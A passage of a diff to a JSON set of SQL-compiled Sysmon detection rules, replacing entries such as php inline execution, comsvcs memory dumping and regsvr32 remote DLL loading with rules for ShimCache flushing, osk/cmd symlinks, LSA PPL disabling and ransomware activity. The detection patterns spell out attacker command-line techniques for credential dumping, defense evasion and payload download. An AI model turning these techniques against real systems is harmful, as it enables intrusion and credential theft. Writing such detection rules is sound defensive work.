using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_php_inline_command_execution.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "Suspicious Calculator Usage", - "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", - "status": "test", - "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", "author": "Florian Roth 
(Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_calc.yml" + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" }, { - "title": "Suspicious VBScript UN2452 Pattern", - "id": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", - "status": "test", - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "status": "experimental", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". 
This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%CreateObject%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "Active Directory Structure Export Via Ldifde.EXE", - "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ldifde_export.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "Delete Important Scheduled Task", - "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", + "status": "test", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Process Dumping Via Comsvcs.DLL", - "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", - "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1036", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Unlikely, because no one should dump the process memory in that way" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE 
'%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Execution Of Non-Existing File", - "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", "status": "experimental", - "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Use Icacls to Hide File to Everyone", - "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", "status": "experimental", - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", - "author": "frack113", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1036" ], "falsepositives": [ - "Legitimate use" + "Exotic software" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'iCACLS.EXE' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 
'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_icacls_deny.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Suspicious SYSVOL Domain Group Policy Access", - "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", - "status": "test", - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "title": "Use of VisualUiaVerifyNative.exe", + "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "status": "experimental", + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrative activity" + "Legitimate testing of Microsoft UI parts." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" ], - "filename": "proc_creation_win_susp_sysvol_access.yml" + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", - "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "status": "experimental", + "description": "Detects execution of the IEExec utility to download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine 
LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_lolbin_ieexec_download.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.010" ], "falsepositives": [ - "FQDNs that start with a number" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE 
'\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Potential SPN Enumeration Via Setspn.EXE", - "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "status": "test", - "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", - "author": "Markus Neis, keepwatch", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": 